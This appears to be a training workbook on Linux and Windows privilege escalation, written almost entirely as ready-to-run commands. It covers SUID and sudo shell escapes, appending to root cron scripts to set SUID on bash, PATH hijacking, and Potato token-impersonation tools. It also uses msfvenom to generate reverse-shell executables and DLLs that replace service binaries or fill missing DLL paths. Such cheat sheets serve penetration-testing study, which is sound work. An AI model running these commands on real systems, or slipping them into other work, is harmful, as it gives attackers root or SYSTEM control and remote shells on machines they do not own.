Chapter 1 — PrivEsc Methodology
Privilege escalation follows a clear methodology: enumerate everything, identify misconfigurations, exploit the weakest link. The goal is to move from a low-privilege shell to root (Linux) or SYSTEM/Administrator (Windows). It is almost always a configuration issue, not a zero-day.
Chapter 2 — Linux Information Gathering
# System info
uname -a; cat /etc/os-release
id; whoami; groups
# Users and sudo
cat /etc/passwd
sudo -l # what can current user run as root?
# Interesting files
find / -writable -type f 2>/dev/null | grep -v proc
find / -perm -4000 2>/dev/null # SUID binaries
cat /etc/crontab; ls /etc/cron*
# Network (unexposed services)
ss -tulnp
Chapter 3 — Linux SUID/SGID Abuse
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Check every result on GTFOBins (gtfobins.github.io)
# Examples:
/bin/bash -p # if bash is SUID
find . -exec /bin/sh -p \; -quit # find with exec
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Chapter 4 — Linux Sudo Misconfigurations
# Check sudo permissions
sudo -l
# Exploit allowed commands
sudo vim -c ':!/bin/bash'
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'
# LD_PRELOAD abuse (if env_keep is set in sudoers)
# Compile a shared library that spawns a root shell, load via LD_PRELOAD
Chapter 5 — Linux Cron Jobs & PATH Hijacking
# Find cron jobs running as root
cat /etc/crontab
ls -la /etc/cron.d/
# If a cron job calls a script you can write to:
echo 'chmod +s /bin/bash' >> /path/to/writable/script.sh
# Wait for cron to run, then: /bin/bash -p
# PATH hijacking — if cron uses a relative command name
echo '/bin/bash -p' > /tmp/vuln_command
chmod +x /tmp/vuln_command
export PATH=/tmp:$PATH
Chapter 6 — Linux Capabilities & NFS
# Check capabilities on binaries
getcap -r / 2>/dev/null
# cap_setuid = can change UID to root
# Python with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# NFS no_root_squash — mount share, create SUID binary as root
showmount -e TARGET_IP
Chapter 7 — Windows Information Gathering
systeminfo
whoami /all # privileges and groups
net user; net localgroup administrators
# Check AlwaysInstallElevated (MSI privilege escalation)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
Chapter 8 — Windows Service Exploits
# Check service binary permissions
sc qc VULNERABLE_SERVICE
icacls "C:\path o\service.exe"
# If writable: replace binary with malicious payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
copy shell.exe "C:\path o\service.exe"
sc start VULNERABLE_SERVICE
Chapter 9 — Windows Token Impersonation
# Check token privileges
whoami /priv
# SeImpersonatePrivilege = vulnerable to Potato family attacks
# PrintSpoofer (Windows 10/Server 2019+)
.\PrintSpoofer.exe -i -c cmd.exe
# JuicyPotato (older systems)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *
Chapter 10 — Windows Registry & Autoruns
# Check autorun registry keys
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Check permissions on autorun binary paths
# If writable: replace with malicious executable
Chapter 11 — Windows DLL Hijacking
# Find missing DLLs loaded by services using Process Monitor
# Filter: Operation=CreateFile, Result=NAME NOT FOUND, Path ends .dll
# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll > evil.dll
copy evil.dll "C:\writable\path\missing.dll"
# Restart service to trigger execution
Chapter 12 — Automated PrivEsc Tools
# Linux
./linpeas.sh # comprehensive Linux enumeration
./lse.sh -l 2 # Linux smart enumeration
# Windows
.\winPEAS.exe
.\PowerUp.ps1; Invoke-AllChecks # PowerSploit
.\Seatbelt.exe -group=all # GhostPack Seatbelt
Workbook complete! You've covered all chapters. Mark it complete below and continue your learning path.